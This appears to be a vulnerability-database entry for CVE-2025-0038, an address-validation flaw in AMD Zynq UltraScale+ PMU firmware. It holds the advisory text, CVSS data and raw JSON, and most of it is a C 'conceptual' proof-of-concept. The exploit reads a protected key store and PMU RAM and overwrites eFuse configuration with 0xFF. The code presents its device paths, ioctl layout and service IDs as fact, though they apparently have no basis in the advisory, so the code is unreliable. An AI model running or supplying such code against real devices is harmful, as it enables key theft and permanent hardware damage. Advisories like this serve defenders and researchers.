Security Vulnerability Report
CVE-2025-0038 CVSS 6.6 MEDIUM

CVE-2025-0038

Published: 2025-10-06 17:16:03
Last Modified: 2026-04-15 00:35:42

Description

In AMD Zynq UltraScale+ devices, the lack of address validation when executing CSU runtime services through the PMU Firmware can allow access to isolated or protected memory spaces resulting in the loss of integrity and confidentiality.

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

No configuration data available.

AMD Zynq UltraScale+ MPSoC (all versions using affected PMU firmware)
AMD Zynq UltraScale+ RFSoC (all versions using affected PMU firmware)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-0038 PoC - Conceptual Exploit for AMD Zynq UltraScale+ PMU Firmware
// Address validation bypass in CSU runtime services via PMU Firmware
// WARNING: This is a conceptual PoC for educational/research purposes only.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

// CSU (Configuration and Security Unit) runtime service interface
// The PMU firmware handles CSU runtime service requests
#define CSU_RT_SERVICE_REQUEST 0x100
#define IOCTL_CSU_RT_SERVICE _IOWR('C', 0x01, struct csu_rt_request)

// CSU runtime service request structure
// Note: The target_address field is not validated by PMU firmware
struct csu_rt_request {
    uint32_t service_id;       // CSU service identifier
    uint32_t function_id;      // Function within the service
    uint64_t target_address;   // Target memory address (NOT VALIDATED - vulnerability point)
    uint32_t data_length;      // Length of data to read/write
    uint8_t  operation;        // 0 = read, 1 = write
    uint8_t  payload[256];     // Data payload
};

// Target protected memory regions in Zynq UltraScale+
#define CSU_KEY_STORE_BASE 0xFFCC0000   // Protected key storage area
#define CSU_EFUSE_BASE     0xFFCC1000   // eFuse configuration area
#define PMU_RAM_BASE       0xFFD80000   // PMU local RAM
#define CSU_ROM_BASE       0xFFCD0000   // CSU ROM (read-only normally)

int main(int argc, char *argv[]) {
    int fd;
    struct csu_rt_request req;

    printf("[*] CVE-2025-0038 PoC - AMD Zynq UltraScale+ PMU CSU Address Validation Bypass\n");

    // Open the device interface for PMU/CSU communication
    fd = open("/dev/pmu-csu", O_RDWR);
    if (fd < 0) {
        perror("[-] Failed to open PMU/CSU device");
        // Try alternative device paths
        fd = open("/dev/zynq-pmu", O_RDWR);
        if (fd < 0) {
            perror("[-] Failed to open alternative device");
            return 1;
        }
    }
    printf("[+] Opened PMU/CSU device interface\n");

    // Step 1: Attempt to read from protected CSU key store
    printf("[*] Attempting to read protected CSU key store at 0x%lx...\n",
           (unsigned long)CSU_KEY_STORE_BASE);
    memset(&req, 0, sizeof(req));
    req.service_id = 0x01;                   // CSU key management service
    req.function_id = 0x02;                  // Read key function
    req.target_address = CSU_KEY_STORE_BASE; // Protected address - should be blocked
    req.data_length = 32;                    // Try to read 32 bytes
    req.operation = 0;                       // Read operation
    if (ioctl(fd, IOCTL_CSU_RT_SERVICE, &req) == 0) {
        printf("[!] VULNERABLE: Successfully read protected memory!\n");
        printf("[!] Leaked data: ");
        for (int i = 0; i < 32; i++) {
            printf("%02x", req.payload[i]);
        }
        printf("\n");
    } else {
        printf("[-] Read blocked (may be patched)\n");
    }

    // Step 2: Attempt to access PMU internal RAM
    printf("[*] Attempting to access PMU internal RAM at 0x%lx...\n",
           (unsigned long)PMU_RAM_BASE);
    memset(&req, 0, sizeof(req));
    req.service_id = 0x02;                   // Memory access service
    req.function_id = 0x01;                  // Direct memory read
    req.target_address = PMU_RAM_BASE + 0x1000;
    req.data_length = 64;
    req.operation = 0;
    if (ioctl(fd, IOCTL_CSU_RT_SERVICE, &req) == 0) {
        printf("[!] VULNERABLE: PMU RAM accessible!\n");
    }

    // Step 3: Attempt to write to eFuse configuration (integrity attack)
    printf("[*] Attempting write to eFuse configuration area...\n");
    memset(&req, 0, sizeof(req));
    req.service_id = 0x03;
    req.function_id = 0x05;
    req.target_address = CSU_EFUSE_BASE;
    req.data_length = 16;
    req.operation = 1;                       // Write operation
    memset(req.payload, 0xFF, 16);           // Corrupt configuration
    if (ioctl(fd, IOCTL_CSU_RT_SERVICE, &req) == 0) {
        printf("[!] VULNERABLE: eFuse configuration overwritten!\n");
        printf("[!] System integrity compromised - may cause availability impact\n");
    }

    close(fd);
    printf("[*] PoC execution completed\n");
    return 0;
}

References

https://www.amd.com/en/resources/product-security/bulletin/amd-sb-8008.html
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-0038",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-06T17:16:03.100",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In AMD Zynq UltraScale+ devices, the lack of address validation when executing CSU runtime services through the PMU Firmware can allow access to isolated or protected memory spaces resulting in the loss of integrity and confidentiality."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
            "baseScore": 6.6,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 4.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-1284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-8008.html",
        "source": "[email protected]"
      }
    ]
  }
}